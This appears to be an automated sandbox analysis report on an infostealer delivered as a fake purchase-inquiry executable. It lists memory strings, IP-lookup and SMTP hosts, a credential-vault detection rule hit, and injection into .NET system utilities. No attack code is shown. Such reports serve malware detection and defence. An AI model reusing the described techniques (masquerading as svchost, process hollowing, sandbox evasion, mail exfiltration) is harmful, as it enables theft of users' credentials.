                    Source: InstallUtil.exe, 0000000F.00000002.2920560159.0000000005D70000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2870944580.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2877570286.0000000002C03000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2877570286.0000000002B55000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2927965743.0000000005CE1000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2879219152.0000000002A17000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2879219152.0000000002AC6000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2927965743.0000000005D80000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2927965743.0000000005CC0000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2870897490.0000000000DC6000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000025.00000002.2880930308.0000000002CA8000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000025.00000002.2880930308.0000000002D56000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000025.00000002.2870404709.0000000000F9B000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000025.00000002.2930648063.0000000005F60000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000025.00000002.2874066632.0000000001001000.00000004.00000020.00020000.00000000.sdmp, jsc.exe, 00000030.00000002.2926843010.0000000005F90000.00000004.00000020.00020000.00000000.sdmp, jsc.exe, 00000030.00000002.2871849560.0000000000ECD000.00000004.00000020.00020000.00000000.sdmp, jsc.exe, 00000030.00000002.2877901296.0000000002D37000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0=
                    Source: InstallUtil.exe, 0000000F.00000002.2877570286.0000000002B11000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2879219152.00000000029B1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000025.00000002.2880930308.0000000002C41000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000030.00000002.2877901296.0000000002CD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
                    Source: svchost.exe, 0000000A.00000002.1951190826.0000021690011000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.1951190826.0000021690133000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2877570286.0000000002B11000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2868061435.0000000000437000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2879219152.00000000029B1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000025.00000002.2880930308.0000000002C41000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000030.00000002.2877901296.0000000002CD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
                    Source: InstallUtil.exe, 0000000F.00000002.2920560159.0000000005D70000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2870944580.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2877570286.0000000002C03000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2877570286.0000000002B55000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2927965743.0000000005CE1000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2879219152.0000000002A17000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2879219152.0000000002AC6000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2927965743.0000000005D80000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2927965743.0000000005CC0000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2870897490.0000000000DC6000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000025.00000002.2880930308.0000000002CA8000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000025.00000002.2880930308.0000000002D56000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000025.00000002.2870404709.0000000000F9B000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000025.00000002.2930648063.0000000005F60000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000025.00000002.2874066632.0000000001001000.00000004.00000020.00020000.00000000.sdmp, jsc.exe, 00000030.00000002.2926843010.0000000005F90000.00000004.00000020.00020000.00000000.sdmp, jsc.exe, 00000030.00000002.2871849560.0000000000ECD000.00000004.00000020.00020000.00000000.sdmp, jsc.exe, 00000030.00000002.2877901296.0000000002D37000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0B
                    Source: RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exe, 00000000.00000002.1664238561.000002091F998000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2877570286.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2879219152.0000000002961000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000025.00000002.2880930308.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000030.00000002.2877901296.0000000002C81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: InstallUtil.exe, 0000000F.00000002.2877570286.0000000002B4D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2877570286.0000000002C03000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2879219152.0000000002AC6000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2879219152.0000000002A0F000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000025.00000002.2880930308.0000000002D56000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000025.00000002.2880930308.0000000002CA0000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000030.00000002.2877901296.0000000002D2F000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000030.00000002.2877901296.0000000002DE6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://smtp.zoho.eu
                    Source: InstallUtil.exe, 0000000F.00000002.2920560159.0000000005D70000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2870944580.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2877570286.0000000002C03000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2877570286.0000000002B55000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2874204896.0000000000E74000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2927965743.0000000005CE1000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2879219152.0000000002A17000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2879219152.0000000002AC6000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2927965743.0000000005D80000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2927965743.0000000005CC0000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2870897490.0000000000DC6000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000025.00000002.2880930308.0000000002CA8000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000025.00000002.2880930308.0000000002D56000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000025.00000002.2870404709.0000000000F9B000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000025.00000002.2930648063.0000000005F60000.00000004.00000020.00020000.00000000.sdmp, jsc.exe, 00000030.00000002.2926843010.0000000005F90000.00000004.00000020.00020000.00000000.sdmp, jsc.exe, 00000030.00000002.2871849560.0000000000ECD000.00000004.00000020.00020000.00000000.sdmp, jsc.exe, 00000030.00000002.2877901296.0000000002D37000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000030.00000002.2877901296.0000000002DE6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://status.thawte.com0:
                    Source: Amcache.hve.18.drString found in binary or memory: http://upx.sf.net
                    Source: InstallUtil.exe, 0000000F.00000002.2920560159.0000000005D70000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2870944580.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2877570286.0000000002C03000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2877570286.0000000002B55000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2874204896.0000000000E74000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2927965743.0000000005CE1000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2879219152.0000000002A17000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2879219152.0000000002AC6000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2927965743.0000000005D80000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2927965743.0000000005CC0000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2870897490.0000000000DC6000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000025.00000002.2880930308.0000000002CA8000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000025.00000002.2880930308.0000000002D56000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000025.00000002.2870404709.0000000000F9B000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000025.00000002.2930648063.0000000005F60000.00000004.00000020.00020000.00000000.sdmp, jsc.exe, 00000030.00000002.2926843010.0000000005F90000.00000004.00000020.00020000.00000000.sdmp, jsc.exe, 00000030.00000002.2877901296.0000000002D37000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000030.00000002.2877901296.0000000002DE6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
                    Source: svchost.exe, 0000000A.00000002.1951190826.0000021690011000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.1951190826.0000021690133000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000030.00000002.2868048682.0000000000438000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                    Source: svchost.exe, 0000000A.00000002.1951190826.0000021690011000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.1951190826.0000021690133000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2877570286.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2868061435.0000000000437000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2879219152.0000000002961000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000025.00000002.2880930308.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000030.00000002.2877901296.0000000002C81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
                    Source: InstallUtil.exe, 0000000F.00000002.2877570286.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2879219152.0000000002961000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000025.00000002.2880930308.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000030.00000002.2877901296.0000000002C81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                    Source: InstallUtil.exe, 0000000F.00000002.2877570286.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2879219152.0000000002961000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000025.00000002.2880930308.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000030.00000002.2877901296.0000000002C81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
                    Source: InstallUtil.exe, 0000000F.00000002.2920560159.0000000005D70000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2870944580.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2877570286.0000000002C03000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2877570286.0000000002B55000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2927965743.0000000005CE1000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2879219152.0000000002A17000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2879219152.0000000002AC6000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2927965743.0000000005D80000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2927965743.0000000005CC0000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2870897490.0000000000DC6000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000025.00000002.2880930308.0000000002CA8000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000025.00000002.2880930308.0000000002D56000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000025.00000002.2930648063.000000000601B000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000025.00000002.2870404709.0000000000F9B000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000025.00000002.2930648063.0000000005F60000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000025.00000002.2874066632.0000000001001000.00000004.00000020.00020000.00000000.sdmp, jsc.exe, 00000030.00000002.2926843010.0000000005F90000.00000004.00000020.00020000.00000000.sdmp, jsc.exe, 00000030.00000002.2871849560.0000000000ECD000.00000004.00000020.00020000.00000000.sdmp, jsc.exe, 00000030.00000002.2877901296.0000000002D37000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
Source: unknown | Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown | Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49678 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown | Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown | HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.4:49745 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.4:49759 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: 10.2.svchost.exe.2169004f2c0.3.raw.unpack, 3DlgK9re6m.cs | .Net Code: DXScWpy
Source: 10.2.svchost.exe.21690133730.2.raw.unpack, 3DlgK9re6m.cs | .Net Code: DXScWpy

System Summary

Source: 10.2.svchost.exe.2169004f2c0.3.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 10.2.svchost.exe.2169004f2c0.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 10.2.svchost.exe.21690133730.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 10.2.svchost.exe.21690133730.2.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: initial sample | Static PE information: Filename: RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exe
Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 41_2_00007FFD9B8D188A NtUnmapViewOfSection
Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exe | Code function: 0_2_00007FFD9B8B5AB0
Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exe | Code function: 0_2_00007FFD9B8BA200
Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exe | Code function: 0_2_00007FFD9B8B0620
Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exe | Code function: 0_2_00007FFD9B8BD511
Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exe | Code function: 0_2_00007FFD9B8BD130
Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exe | Code function: 0_2_00007FFD9B8B91F2
Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exe | Code function: 0_2_00007FFD9B8C0658
Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exe | Code function: 0_2_00007FFD9B8C6478
Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exe | Code function: 0_2_00007FFD9B8C58D9
Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 8_2_00007FFD9B885AB0
Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 8_2_00007FFD9B88A200
Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 8_2_00007FFD9B88D130
Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 8_2_00007FFD9B880620
Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 8_2_00007FFD9B88D511
Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 8_2_00007FFD9B885970
Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 8_2_00007FFD9B8891F2
Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 8_2_00007FFD9B8958D9
Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 8_2_00007FFD9B890658
Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 8_2_00007FFD9B896478
Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 10_2_00007FFD9B8A5AB0
Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 10_2_00007FFD9B8AA200
Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 10_2_00007FFD9B8AD130
Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 10_2_00007FFD9B8AD511
Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 10_2_00007FFD9B8A5970
Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 10_2_00007FFD9B8A91F2
Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 10_2_00007FFD9B8B58D9
Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 10_2_00007FFD9B8A0620
Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 10_2_00007FFD9B8B0658
Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 10_2_00007FFD9B8B6478
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 15_2_010A4AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 15_2_010A3EB8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 15_2_010A4200
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 15_2_066B66B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 15_2_066B87F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 15_2_066BF7D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 15_2_066BB3E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 15_2_066B33A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 15_2_066B0040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 15_2_066BE888
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 15_2_066B0006
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 15_2_066B8F2F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 15_2_066BAD00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 15_2_066B59C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 26_2_00F34AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 26_2_00F3DB28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 26_2_00F33EB8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 26_2_00F34200
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 26_2_066B87F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 26_2_066BF7D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 26_2_066BB3E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 26_2_066B33A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 26_2_066B0040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 26_2_066BE898
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 26_2_066B59D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 26_2_066B0006
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 26_2_066B8F40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 26_2_066BAD00
Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 27_2_00007FFD9B875B11
Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 27_2_00007FFD9B87A200
Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 27_2_00007FFD9B87D130
Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 27_2_00007FFD9B870620
Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 27_2_00007FFD9B87D511
Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 27_2_00007FFD9B875970
Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 27_2_00007FFD9B8791F2
Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 27_2_00007FFD9B8858D9
Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 27_2_00007FFD9B880658
Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 27_2_00007FFD9B886478
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 37_2_01094AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 37_2_01093EB8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 37_2_01094200
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 37_2_06AA66B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 37_2_06AA87F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 37_2_06AAF7D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 37_2_06AA33A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 37_2_06AAB3E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 37_2_06AA034D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 37_2_06AA9C48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 37_2_06AAE888
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 37_2_06AA8F2F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 37_2_06AAAD00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 37_2_06AA59C0
Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 41_2_00007FFD9B8B0620
Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 41_2_00007FFD9B8B5B11
Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 41_2_00007FFD9B8B91F2
Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 41_2_00007FFD9B8CFB38
Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 41_2_00007FFD9B8CD897
Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 41_2_00007FFD9B8CBBBE
Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 41_2_00007FFD9B8C0658
Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 41_2_00007FFD9B8BF3A3
Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 41_2_00007FFD9B8BD511
Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 41_2_00007FFD9B8BD130
Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 41_2_00007FFD9B8C6478
Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 41_2_00007FFD9B8C58D9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe | Code function: 48_2_010C4AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe | Code function: 48_2_010C3EB8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe | Code function: 48_2_010C4200
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe | Code function: 48_2_06F066B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe | Code function: 48_2_06F087F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe | Code function: 48_2_06F0F7D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe | Code function: 48_2_06F0B3E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe | Code function: 48_2_06F033A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe | Code function: 48_2_06F00040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe | Code function: 48_2_06F09C48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe | Code function: 48_2_06F0E888
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe | Code function: 48_2_06F00006
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe | Code function: 48_2_06F08F2F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe | Code function: 48_2_06F0AD00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe | Code function: 48_2_06F059C0
Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 456 -p 7792 -ip 7792
Source: svchost.exe.0.dr | Static PE information: No import functions for PE file found
Source: RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exe | Static PE information: No import functions for PE file found
Source: RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exe, 00000000.00000000.1606308025.000002091D7B2000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameasia.exe* vs RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exe
Source: RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exe | Binary or memory string: OriginalFilenameasia.exe* vs RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exe
